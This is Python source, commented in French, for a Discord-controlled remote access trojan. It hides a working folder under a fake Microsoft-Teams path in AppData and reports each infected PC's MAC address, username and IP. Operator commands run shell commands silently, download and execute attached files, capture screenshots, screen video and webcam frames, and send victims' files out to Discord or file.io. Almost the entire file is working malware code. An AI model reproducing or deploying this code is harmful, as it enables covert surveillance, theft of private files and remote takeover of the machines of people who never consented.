import sys
import discord
from discord.ext import commands
import os
import datetime
import subprocess
from datetime import datetime
import pyautogui
import traceback
import requests
import shutil
import asyncio
import ctypes
import cv2
import numpy as np
from PIL import Image
import io
import socket
import threading
import uuid
import tempfile

# Obtenir le nom d'utilisateur actuel
current_user = os.getlogin()

CAM_CHANNEL_ID = 1326872701616394250

# Créer le chemin personnalisé avec le nom d'utilisateur
custom_temp_dir = f"C:\\Users\\{current_user}\\AppData\\Local\\Microsoft-Teams\\temp"

# Vérifier si le répertoire existe, sinon le créer
if not os.path.exists(custom_temp_dir):
    os.makedirs(custom_temp_dir)

# Rendre le dossier caché mais visible dans les fichiers masqués
subprocess.run(['attrib', '+h', custom_temp_dir])


# Création des intents
intents = discord.Intents.default()
intents.messages = True
intents.message_content = True
intents.reactions = True
intents.guilds = True
intents.members = True
intents.presences = True

bot = commands.Bot(command_prefix="!", intents=intents)


# Supprimer la commande `help` par défaut
bot.remove_command('help')

# Stockage des PCs connectés
connected_pcs = {}



# Fonction pour obtenir un identifiant unique basé sur l'adresse MAC
def get_unique_pc_id():
    # Utilisation de l'adresse MAC comme identifiant unique
    mac_address = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)])
    return mac_address

@bot.command(name='install')
async def install(ctx, pc_id: str, target_path: str):
    """
    Télécharge et installe un fichier joint sur un PC connecté à un emplacement spécifié.
    """
    # Si l'ID est 'all', appliquer l'installation à tous les PCs connectés
    if pc_id.lower() == 'all':
        if not connected_pcs:
            await ctx.send("> Aucun PC connecté actuellement.")
            return

        # Appliquer l'installation à chaque PC connecté
        for current_pc_id in list(connected_pcs.keys()):
            await install_file_on_pc(ctx, current_pc_id, target_path)
        return  # Terminer la fonction après avoir exécuté sur tous les PCs

    # Si l'ID n'est pas 'all', vérifier si le PC est connecté
    pc_info = connected_pcs.get(pc_id)
    if not pc_info:
        await ctx.send(f"> Aucun PC trouvé avec l'ID {pc_id}.")
        return

    # Appliquer l'installation au PC spécifique
    await install_file_on_pc(ctx, pc_id, target_path)


async def install_file_on_pc(ctx, pc_id: str, target_path: str):
    """
    Fonction auxiliaire pour installer un fichier sur un PC spécifique.
    """
    # Vérifier s'il y a une pièce jointe
    if len(ctx.message.attachments) == 0:
        await ctx.send("> Aucune pièce jointe trouvée. Veuillez joindre un fichier à la commande.")
        return

    attachment = ctx.message.attachments[0]
    file_name = attachment.filename

    try:
        # Chemin temporaire pour télécharger le fichier (modifié pour utiliser custom_temp_dir)
        temp_path = os.path.join(custom_temp_dir, file_name)
        
        # Télécharger la pièce jointe
        await attachment.save(temp_path)
        await ctx.send(f"> Fichier {file_name} téléchargé dans l'emplacement temporaire : {temp_path}.")

        # Vérifier si le chemin cible inclut un nom de fichier
        if os.path.isdir(target_path):
            target_path = os.path.join(target_path, file_name)

        # Copier le fichier au chemin cible
        if not os.path.exists(os.path.dirname(target_path)):
            os.makedirs(os.path.dirname(target_path))  # Crée le répertoire si nécessaire

        os.replace(temp_path, target_path)
        await ctx.send(f"> Fichier {file_name} installé avec succès à l'emplacement : {target_path}.")

    except Exception as e:
        await ctx.send(f"> Une erreur est survenue lors de l'installation du fichier : {e}")

    finally:
        # Nettoyer le répertoire temporaire
        if os.path.exists(temp_path):
            os.remove(temp_path)

# Commande `cmd`
import subprocess

@bot.command(name='cmd')
async def cmd_command(ctx, id_pc: str, *, args):
    
    # Si l'ID est 'all', exécuter la commande sur tous les PCs connectés
    if id_pc.lower() == 'all':
        if not connected_pcs:
            await ctx.send("> Aucun PC connecté actuellement.")
            return

        # Exécuter la commande sur chaque PC
        for current_pc_id in list(connected_pcs.keys()):
            await execute_cmd_on_pc(ctx, current_pc_id, args)

    else:
        # Si l'ID n'est pas 'all', vérifier que le PC existe
        if id_pc not in connected_pcs:
            await ctx.send(f"Le PC avec l'ID {id_pc} n'est pas connecté.")
            return
        
        # Exécuter la commande sur le PC spécifique
        await execute_cmd_on_pc(ctx, id_pc, args)


async def execute_cmd_on_pc(ctx, pc_id: str, commande: str):
    """
    Fonction auxiliaire pour exécuter une commande sur un PC spécifique.
    """
    try:
        result = subprocess.run(commande, shell=True, capture_output=True, text=True)
        output = result.stdout

        # Si la sortie est trop longue, l'envoyer en plusieurs messages
        if output:
            max_length = 2000  # Limite de caractères par message
            # Tentative d'utilisation de l'encodage utf-8
            try:
                output = output.encode('utf-8', errors='replace').decode('utf-8')
            except UnicodeDecodeError:
                output = output.encode('cp1252', errors='replace').decode('cp1252')

            if len(output) > max_length:
                # Diviser la sortie en morceaux de taille max_length
                for i in range(0, len(output), max_length):
                    await ctx.send(f"Résultat de la commande exécutée sur {pc_id} (partie {i//max_length + 1}):\n```\n{output[i:i+max_length]}\n```")
            else:
                await ctx.send(f"Résultat de la commande exécutée sur {pc_id} :\n```\n{output}\n```")
        elif result.stderr:
            await ctx.send(f"Erreur lors de l'exécution de la commande sur {pc_id} :\n```\n{result.stderr}\n```")
        else:
            await ctx.send(f"Aucun résultat trouvé pour la commande exécutée sur {pc_id}.")

    except Exception as e:
        await ctx.send(f"Une erreur est survenue lors de l'exécution de la commande sur {pc_id} : {str(e)}")

# Capture de l'écran et encodage vidéo en temps réel
def capture_and_encode(output_path, duration, fps=30, resolution=(1280, 720)):
    """
    Capture l'écran en continu et encode en vidéo.
    :param output_path: Chemin pour sauvegarder la vidéo.
    :param duration: Durée en secondes du flux vidéo.
    :param fps: Nombre d'images par seconde.
    :param resolution: Résolution souhaitée pour la vidéo (largeur, hauteur).
    """
    width, height = resolution

    # Initialise l'écrivain vidéo
    fourcc = cv2.VideoWriter_fourcc(*'XVID')
    video_writer = cv2.VideoWriter(output_path, fourcc, fps, (width, height))

    # Capture des frames pour la durée spécifiée
    for _ in range(int(duration * fps)):
        screenshot = pyautogui.screenshot()
        frame = np.array(screenshot)

        # Redimensionne pour correspondre à la résolution choisie
        frame = cv2.resize(frame, (width, height))
        frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)  # Convertit en format BGR pour OpenCV
        video_writer.write(frame)

    video_writer.release()


@bot.command()
async def cam(ctx, pc_id: str, duration: int):
    """
    Commande Discord pour capturer et diffuser un flux vidéo continu dans un salon vocal/vidéo.
    :param pc_id: ID du PC (non utilisé pour l'instant, prévu pour extension multi-PC).
    :param duration: Durée en secondes pour le flux vidéo.
    """
    # Vérifie si la durée est valide
    if duration <= 0:
        await ctx.send("Durée invalide. Utilise une durée supérieure à 0 secondes.")
        return

    # Recherche du salon vocal/vidéo
    cam_channel = bot.get_channel(CAM_CHANNEL_ID)
    if cam_channel is None:
        await ctx.send("❌ Le salon vocal/vidéo est introuvable.")
        return

    # Tente de faire rejoindre le bot dans le salon vocal
    await ctx.send("🚶‍♂️ Tentative de rejoindre le salon vocal...")
    voice_channel = cam_channel.guild.get_channel(CAM_CHANNEL_ID)
    if voice_channel is None:
        await ctx.send("❌ Impossible de rejoindre le salon vocal.")
        return

    # Connexion du bot au salon vocal
    if not voice_channel.guild.voice_client:
        await voice_channel.connect()
        await ctx.send(f"🎤 Bot rejoint le salon vocal : {voice_channel.name}")
    else:
        await ctx.send(f"🔊 Bot déjà dans un salon vocal : {voice_channel.name}")

    # Capture vidéo continue en temps réel
    await ctx.send("🎥 Début du flux vidéo en direct...")
    
    # Ouvre la capture vidéo
    screen_capture = cv2.VideoCapture(0)  # Utilisez l'index approprié pour l'écran ou la caméra
    if not screen_capture.isOpened():
        await ctx.send("❌ Impossible de démarrer la capture vidéo.")
        return

    # Capture et envoi de la vidéo en temps réel
    start_time = datetime.now()
    while (datetime.now() - start_time).seconds < duration:
        ret, frame = screen_capture.read()
        if not ret:
            await ctx.send("❌ Erreur de capture de l'écran.")
            break

        # Convertir l'image capturée en format compatible pour l'envoi
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        frame_pil = Image.fromarray(frame)
        frame_bytes = io.BytesIO()
        frame_pil.save(frame_bytes, format='PNG')
        frame_bytes.seek(0)

        # Envoi de l'image capturée dans le salon vocal
        await cam_channel.send(file=discord.File(frame_bytes, 'cam_frame.png'))

        # Attente pour la prochaine image
        await asyncio.sleep(1 / 30)  # À 30 FPS

    # Déconnexion après la fin de la diffusion
    await ctx.send("📡 Fin du flux vidéo.")
    if voice_channel.guild.voice_client:
        await voice_channel.guild.voice_client.disconnect()
        await ctx.send(f"❌ Bot déconnecté du salon vocal : {voice_channel.name}")

        
@bot.command(name='popup')
async def popup(ctx, pc_id: str, type_message: str, *, message: str):
    """
    Envoie un message pop-up à un PC ou à tous les PCs connectés avec le type et le message spécifié.
    """
    # Si l'ID est 'all', appliquer l'envoi du pop-up à tous les PCs connectés
    if pc_id.lower() == 'all':
        if not connected_pcs:
            await ctx.send("> Aucun PC connecté actuellement.")
            return

        # Appliquer l'envoi du pop-up à chaque PC connecté
        for current_pc_id in list(connected_pcs.keys()):
            await send_popup_to_pc(ctx, current_pc_id, type_message, message)
        return  # Terminer la fonction après avoir exécuté sur tous les PCs

    # Si l'ID n'est pas 'all', vérifier si le PC est connecté
    pc_info = connected_pcs.get(pc_id)
    if not pc_info:
        await ctx.send(f"> Aucun PC trouvé avec l'ID {pc_id}.")
        return

    # Appliquer l'envoi du pop-up au PC spécifique
    await send_popup_to_pc(ctx, pc_id, type_message, message)


async def send_popup_to_pc(ctx, pc_id: str, type_message: str, message: str):
    """
    Fonction auxiliaire pour envoyer un message pop-up à un PC spécifique.
    """
    try:
        # Définir le type d'icône pour la pop-up
        if type_message == "info":
            icon_type = 0x40  # Icône d'information
        elif type_message == "warning":
            icon_type = 0x30  # Icône d'avertissement
        elif type_message == "error":
            icon_type = 0x10  # Icône d'erreur
        elif type_message == "question":
            icon_type = 0x20  # Icône de question
        else:
            await ctx.send("> Type de message invalide. Utilise 'info', 'warning', 'error' ou 'question'.")
            return

        # Envoi du message pop-up
        await ctx.send(f"> Envoi du message pop-up à {pc_id}: {message} avec le type {type_message}.")

        # Affichage de la pop-up avec le type spécifié
        ctypes.windll.user32.MessageBoxW(0, message, "SPN ?", icon_type | 0x1)

    except Exception as e:
        await ctx.send(f"> Une erreur est survenue lors de l'envoi du pop-up à {pc_id}: {e}")


@bot.command(name='help')
async def help_command(ctx):
    """
    Affiche une liste des commandes disponibles avec une description détaillée.
    """
    embed = discord.Embed(
        title="Aide du Bot Projet SPN",
        description="Commandes disponibles pour interagir avec le bot.",
        color=0x3498db
    )

    # Liste des commandes avec descriptions
    commandes = [
        ("!list", "Liste tous les PCs connectés avec leurs informations."),
        ("!capture <ID_PC> <nombre> <intervalle>", 
         "Prend des captures d'écran sur le PC spécifié à intervalle régulier.\n"
         "Exemple : `!capture 00:1a:2b:3c:4d:5e 5 10s`"),
        ("!record <ID_PC> <durée> <intervalle> <nombre>",
         "Enregistre des vidéos de l'écran du PC spécifié.\n"
         "Exemple : `!record 00:1a:2b:3c:4d:5e 10s 5s 3`"),
        ("!shutdown <ID_PC>", 
         "Éteint le PC spécifié.\nExemple : `!shutdown 00:1a:2b:3c:4d:5e`"),
        ("!execute <ID_PC>", 
         "Télécharge et exécute un fichier joint sur le PC spécifié.\n"
         "Exemple : `!execute 00:1a:2b:3c:4d:5e`"),
         ("!upload <ID_PC> <chemin_du_fichier>", 
         "Récupère un fichier d'un PC connecté et l'envoie dans le canal 'résultat'.\n"
         "Exemple : `!upload 00:1a:2b:3c:4d:5e \"C:\\user\\photo.png\"`"),
        ("!install <ID_PC> <chemin_cible>",
         "Installe un fichier joint sur un PC connecté à l'emplacement spécifié.\n"
         "Exemple : `!install 00:1a:2b:3c:4d:5e C:\\Users\\Utilisateur\\Documents`"),
        ("!cmd <ID_PC> <commande>", 
         "Exécute une commande sur le PC spécifié et retourne le résultat.\n"
         "Exemple : `!cmd 00:1a:2b:3c:4d:5e dir`"),
        ("!cam <PC_ID> <durée>", 
         "Diffuse un flux vidéo en direct de la caméra du PC spécifié dans un salon vocal/vidéo.\n"
         "Exemple : `!cam 00:1a:2b:3c:4d:5e 30`"),
        ("!popup <ID_PC> <type> <message>",
         "Affiche une popup avec un message sur le PC spécifié.\n"
         "Types : info, warning, error, question.\n"
         "Exemple : `!popup 00:1a:2b:3c:4d:5e info 'Bonjour !'`"),
        ("!help", "Affiche cette aide.")
    ]

    # Ajout des commandes dans l'embed
    for nom, description in commandes:
        embed.add_field(name=nom, value=description, inline=False)

    await ctx.send(embed=embed)

@bot.command(name='upload')
async def upload(ctx, pc_id: str, path: str):
    """
    Récupère un fichier ou un dossier sur un PC connecté et l'envoie dans le canal 'résultat'.
    Si un dossier est spécifié, il sera compressé en ZIP avant l'envoi.
    Si le fichier/dossier dépasse 8 Mo, il sera téléchargé sur file.io.
    """
    if pc_id.lower() == 'all':
        await ctx.send("> Cette commande ne peut être utilisée qu'avec un PC spécifique. Veuillez fournir un ID unique.")
        return

    # Vérification si le chemin existe
    if not os.path.exists(path):
        await ctx.send(f"> Le chemin spécifié '{path}' n'existe pas sur le PC {pc_id}.")
        return

    async def handle_upload():
        try:
            current_user = os.getlogin()  # Récupère le nom d'utilisateur
            temp_dir = f"C:\\Users\\{current_user}\\AppData\\Local\\Microsoft-Teams\\temp"

            # Si le chemin est un dossier, le compresser en ZIP
            if os.path.isdir(path):
                zip_path = os.path.join(temp_dir, f"{os.path.basename(path)}.zip")
                shutil.make_archive(zip_path.replace(".zip", ""), 'zip', path)
                file_to_send = zip_path
            else:
                file_to_send = path

            # Vérification de la taille du fichier/dossier compressé (en Mo)
            if os.path.isdir(file_to_send):
                raise Exception(f"'{file_to_send}' est un dossier, pas un fichier.")

            file_size = os.path.getsize(file_to_send) / (1024 * 1024)  # Taille en Mo
            if file_size > 8:
                # Si le fichier/dossier dépasse 8 Mo, on le télécharge sur file.io
                await ctx.send(f"> Le fichier ou dossier '{path}' est trop gros. Téléchargement sur file.io...")
                file_url = upload_to_fileio(file_to_send)
                if file_url:
                    await ctx.send(f"> Le fichier ou dossier a été téléchargé avec succès. Voici le lien de téléchargement : {file_url}")
                else:
                    await ctx.send("> Une erreur est survenue lors du téléchargement sur file.io.")
            else:
                # Si le fichier ou dossier est inférieur à 8 Mo, on l'envoie directement sur Discord
                await ctx.send(f"> Récupération du fichier ou dossier '{path}' sur le PC {pc_id}...")
                resultat_channel_id = 1313197803337416774  # Remplacez par l'ID réel du canal 'résultat'
                resultat_channel = bot.get_channel(resultat_channel_id)

                if not resultat_channel:
                    await ctx.send("> Le canal 'résultat' est introuvable.")
                    return

                with open(file_to_send, 'rb') as file:
                    await resultat_channel.send(file=discord.File(file, os.path.basename(file_to_send)))
                await ctx.send(f"> Le fichier ou dossier '{path}' a été envoyé avec succès dans le canal 'résultat'.")
        except Exception as e:
            error_message = traceback.format_exc()
            await ctx.send(f"> Une erreur est survenue lors de l'upload : {e}\nDétails : {error_message}")
        finally:
            # Nettoyage des fichiers temporaires
            if os.path.isdir(path) and os.path.exists(zip_path):
                os.remove(zip_path)

    try:
        # Démarrage de l'upload avec un timeout de 300 secondes (5 minutes)
        await asyncio.wait_for(handle_upload(), timeout=300)
    except asyncio.TimeoutError:
        await ctx.send("> Le délai maximum de 5 minutes pour l'upload a été dépassé. L'upload a été annulé.")
        restart_bot()

def upload_to_fileio(file_path):
    """
    Télécharge un fichier sur file.io et retourne l'URL de téléchargement.
    """
    try:
        with open(file_path, 'rb') as file:
            response = requests.post("https://file.io", files={'file': file})

        if response.status_code == 200:
            return response.json().get('link')
        else:
            return None
    except Exception as e:
        print(f"Erreur lors de l'upload sur file.io : {e}")
        return None

def restart_bot():
    """
    Redémarre le bot en fermant la session actuelle et en relançant le script.
    """
    try:
        python = sys.executable
        script_path = os.path.abspath(__file__)
        print(f"Redémarrage du script : {script_path}")
        os.execl(python, python, script_path)
    except Exception as e:
        print(f"Erreur lors du redémarrage du bot : {e}")




# Commande `list`
@bot.command(name='list')
async def list_pcs(ctx):
    if connected_pcs:
        embed = discord.Embed(title="Liste des PCs connectés :", color=0x2ecc71)
        for pc_id, info in connected_pcs.items():
            embed.add_field(
                name=f"PC {pc_id}", 
                value=f"**Utilisateur :** {info['username']}\n**IP Publique :** {info['ip']}\n**Connecté depuis :** {info['first_connection']}",
                inline=False
            )
        await ctx.send(embed=embed)
    else:
        await ctx.send("> Aucun PC connecté pour le moment.")

# Commande `capture`
@bot.command(name='capture')
async def capture(ctx, pc_id: str, num_captures: int, interval: str):
    """
    Prend des captures d'écran sur un PC spécifié ou sur tous les PCs connectés.
    """
    if pc_id.lower() == 'all':
        for current_pc_id in connected_pcs.keys():
            await capture_on_pc(ctx, current_pc_id, num_captures, interval)
        await ctx.send("> Captures d'écran prises sur tous les PCs connectés.")
    else:
        if pc_id not in connected_pcs:
            await ctx.send(f"> Aucun PC trouvé avec l'ID {pc_id}.")
            return
        await capture_on_pc(ctx, pc_id, num_captures, interval)

async def capture_on_pc(ctx, pc_id, num_captures, interval):
    try:
        # Conversion de l'intervalle en secondes
        if interval.endswith('s'):  # Si l'intervalle est donné en secondes
            interval_seconds = int(interval[:-1])
        elif interval.endswith('m'):  # Si l'intervalle est donné en minutes
            interval_seconds = int(interval[:-1]) * 60
        else:
            await ctx.send(f"> L'intervalle pour {pc_id} doit se terminer par 's' (secondes) ou 'm' (minutes).")
            return

        # Canal pour envoyer les captures
        channel = bot.get_channel(1313197803337416774)  # Remplacer par l'ID réel du salon
        await ctx.send(f"> Prise de {num_captures} captures pour le PC {pc_id} toutes les {interval}.")

        for i in range(num_captures):
            screenshot = pyautogui.screenshot()  # Prendre une capture d'écran
            screenshot_path = os.path.join(tempfile.gettempdir(), f"capture_{pc_id.replace(':', '_')}_{i + 1}.png")  # Nom du fichier
            screenshot.save(screenshot_path)  # Enregistrer la capture

            # Envoyer la capture au salon Discord
            with open(screenshot_path, 'rb') as file:
                await channel.send(file=discord.File(file, screenshot_path))

            # Supprimer la capture après envoi
            os.remove(screenshot_path)

            # Attendre avant la capture suivante
            await asyncio.sleep(interval_seconds)

    except ValueError:
        await ctx.send(f"> Une erreur est survenue lors de la conversion de l'intervalle pour {pc_id}.")
    except Exception as e:
        await ctx.send(f"> Une erreur est survenue pour {pc_id} : {e}")
# Commande `record`
@bot.command(name='record')
async def record(ctx, pc_id: str, duration: str, interval: str, num_videos: int):
    """
    Enregistre des vidéos de l'écran sur un PC spécifié ou sur tous les PCs connectés.
    """
    if pc_id.lower() == 'all':
        for current_pc_id in connected_pcs.keys():
            await record_on_pc(ctx, current_pc_id, duration, interval, num_videos)
        await ctx.send("> Enregistrements vidéo effectués sur tous les PCs connectés.")
    else:
        if pc_id not in connected_pcs:
            await ctx.send(f"> Aucun PC trouvé avec l'ID {pc_id}.")
            return
        await record_on_pc(ctx, pc_id, duration, interval, num_videos)

async def record_on_pc(ctx, pc_id, duration, interval, num_videos):
    try:
        # Conversion des durées
        if duration.endswith('s'):
            duration_seconds = int(duration[:-1])
        elif duration.endswith('m'):
            duration_seconds = int(duration[:-1]) * 60
        else:
            await ctx.send(f"> La durée pour {pc_id} doit se terminer par 's' (secondes) ou 'm' (minutes).")
            return

        if interval.endswith('s'):
            interval_seconds = int(interval[:-1])
        elif interval.endswith('m'):
            interval_seconds = int(interval[:-1]) * 60
        else:
            await ctx.send(f"> L'intervalle pour {pc_id} doit se terminer par 's' (secondes) ou 'm' (minutes).")
            return

        # Canal pour envoyer les vidéos
        channel = bot.get_channel(1313197803337416774)  # Remplacer par l'ID réel du salon
        await ctx.send(f"> Enregistrement de {num_videos} vidéos de l'écran pour le PC {pc_id}, d'une durée de {duration} chacune, toutes les {interval}.")

        for video_index in range(num_videos):
            video_path = os.path.join(tempfile.gettempdir(), f"record_{pc_id.replace(':', '_')}_{video_index + 1}.avi")

            # Configuration vidéo
            import cv2
            import numpy as np
            from datetime import datetime

            screen_width, screen_height = pyautogui.size()
            fourcc = cv2.VideoWriter_fourcc(*'XVID')  # Codec pour AVI
            video = cv2.VideoWriter(video_path, fourcc, 20.0, (screen_width, screen_height))

            start_time = datetime.now()
            frames_written = 0  # Compteur d'images ajoutées
            while (datetime.now() - start_time).seconds < duration_seconds:
                frame = pyautogui.screenshot()
                frame = np.array(frame)  # Convertir PIL -> NumPy
                frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)  # Couleur compatible OpenCV
                video.write(frame)
                frames_written += 1

            video.release()  # Libérer le fichier vidéo
            if frames_written == 0:
                await ctx.send(f"> Aucun frame ajouté pour la vidéo {video_index + 1}. Vidéo non valide.")
                os.remove(video_path)
                continue

            # Envoyer la vidéo sur Discord
            with open(video_path, 'rb') as file:
                await channel.send(file=discord.File(file, os.path.basename(video_path)))

            # Nettoyer les fichiers temporaires
            os.remove(video_path)

            # Pause entre les vidéos
            await asyncio.sleep(interval_seconds)

        await ctx.send(f"> Enregistrement terminé pour {pc_id}.")

    except ValueError:
        await ctx.send(f"> Une erreur est survenue lors de la conversion des paramètres pour {pc_id}.")
    except Exception as e:
        await ctx.send(f"> Une erreur inattendue est survenue pour {pc_id} : {e}")
        
# Commande `shutdown`
@bot.command(name='shutdown')
async def shutdown(ctx, pc_id: str):
    if pc_id.lower() == 'all':
        # Iterate over a copy of the dictionary keys
        for current_pc_id in list(connected_pcs.keys()):
            # Exécuter une action personnalisée avant l'arrêt du PC
            await custom_action(ctx, current_pc_id)
            await ctx.send(f"> Arrêt du PC {current_pc_id}...")
            del connected_pcs[current_pc_id]  # Retirer le PC de la liste des connectés
            await ctx.send(f"> PC {current_pc_id} éteint.")
    else:
        if pc_id not in connected_pcs:
            await ctx.send(f"> Aucun PC trouvé avec l'ID {pc_id}.")
            return
        
        # Exécuter une action personnalisée avant l'arrêt du PC
        await custom_action(ctx, pc_id)
        await ctx.send(f"> Arrêt du PC {pc_id}...")
        del connected_pcs[pc_id]  # Retirer le PC de la liste des connectés
        await ctx.send(f"> PC {pc_id} éteint.")

    # Fermer le bot après l'arrêt des PCs
    await ctx.send("> Fermeture du bot...")
    await bot.close()

# Exemple de fonction pour une action personnalisée
async def custom_action(ctx, pc_id):
    # Ajouter ici les actions à effectuer avant l'arrêt du PC
    await ctx.send(f"> Action personnalisée pour le PC {pc_id} terminée.")


# Commande `execute`
import os
import subprocess
import tempfile

import os
import subprocess

@bot.command(name='execute')
async def execute(ctx, pc_id: str):
    if pc_id.lower() == 'all':
        # Si l'ID est 'all', traiter tous les PC connectés
        if not connected_pcs:
            await ctx.send("> Aucun PC connecté actuellement.")
            return

        for current_pc_id in list(connected_pcs.keys()):
            await execute_on_pc(ctx, current_pc_id)
    else:
        # Si l'ID n'est pas 'all', vérifier que le PC existe
        pc_info = connected_pcs.get(pc_id)
        if not pc_info:
            await ctx.send(f"> Aucun PC trouvé avec l'ID {pc_id}.")
            return

        # Exécuter l'action sur le PC spécifique
        await execute_on_pc(ctx, pc_id)

async def execute_on_pc(ctx, pc_id: str):
    # Vérifier s'il y a une pièce jointe
    if len(ctx.message.attachments) == 0:
        await ctx.send("> Aucune pièce jointe trouvée. Veuillez joindre un fichier à la commande.")
        return

    attachment = ctx.message.attachments[0]
    file_name = attachment.filename
    
    # Utilisation de tempfile pour créer un dossier temporaire sécurisé
    with tempfile.TemporaryDirectory() as temp_dir:
        file_path = os.path.join(temp_dir, file_name)

        # Télécharger la pièce jointe dans le répertoire temporaire
        await attachment.save(file_path)
        await ctx.send(f"> Fichier {file_name} téléchargé dans le répertoire temporaire sur {pc_id}.")

        # Vérifier si le fichier a bien été téléchargé
        if not os.path.exists(file_path):
            await ctx.send(f"> Erreur : le fichier {file_name} n'a pas été téléchargé correctement sur {pc_id}.")
            return

        # Vérifier et exécuter les fichiers .bat, .exe, ou .py
        if file_name.endswith(".bat"):
            await ctx.send(f"> Installation et exécution du fichier {file_name} sur {pc_id}...")
            try:
                subprocess.run([file_path], check=True, shell=True, creationflags=subprocess.CREATE_NO_WINDOW)
                await ctx.send(f"> Fichier {file_name} installé et exécuté avec succès sur {pc_id}.")
            except Exception as e:
                await ctx.send(f"> Erreur lors de l'exécution du fichier {file_name} sur {pc_id}: {str(e)}")

        elif file_name.endswith(".exe"):
            await ctx.send(f"> Exécution du fichier exécutable {file_name} sur {pc_id}...")
            try:
                subprocess.run([file_path], check=True, creationflags=subprocess.CREATE_NO_WINDOW)
                await ctx.send(f"> Fichier {file_name} exécuté avec succès sur {pc_id}.")
            except Exception as e:
                await ctx.send(f"> Erreur lors de l'exécution du fichier {file_name} sur {pc_id}: {str(e)}")

        elif file_name.endswith(".py"):
            await ctx.send(f"> Exécution du script Python {file_name} sur {pc_id}...")
            try:
                subprocess.run(["python", file_path], check=True)
                await ctx.send(f"> Script Python {file_name} exécuté avec succès sur {pc_id}.")
            except Exception as e:
                await ctx.send(f"> Erreur lors de l'exécution du script Python {file_name} sur {pc_id}: {str(e)}")

        else:
            await ctx.send("> Le fichier téléchargé n'est pas un fichier exécutable valide (.bat, .exe, .py).")

    # Le répertoire temporaire est automatiquement nettoyé à la fin de ce bloc
    await ctx.send(f"> Fichier {file_name} supprimé après l'installation sur {pc_id}.")
    
@bot.event
async def on_ready():
    print(f"{bot.user} est connecté à Discord !")
    ip = socket.gethostbyname(socket.gethostname())
    username = os.getlogin()
    pc_id = get_unique_pc_id()  # Utilisation de l'adresse MAC pour obtenir un ID unique
    connected_pcs[pc_id] = {"ip": ip, "username": username, "first_connection": "juste maintenant"}
    channel = bot.get_channel(1313197733443534859)
    if channel:
        embed = discord.Embed(title="Nouveau PC connecté", color=0x2ecc71)
        embed.add_field(name="PC ID", value=pc_id, inline=True)
        embed.add_field(name="Utilisateur", value=username, inline=True)
        embed.add_field(name="IP Publique", value=ip, inline=True)
        embed.set_footer(text="Connecté depuis juste maintenant.")
        await channel.send(embed=embed)

# Lancer le bot
bot.run("TOKEN")  # Remplace "TON_TOKEN_ICI" par ton token réel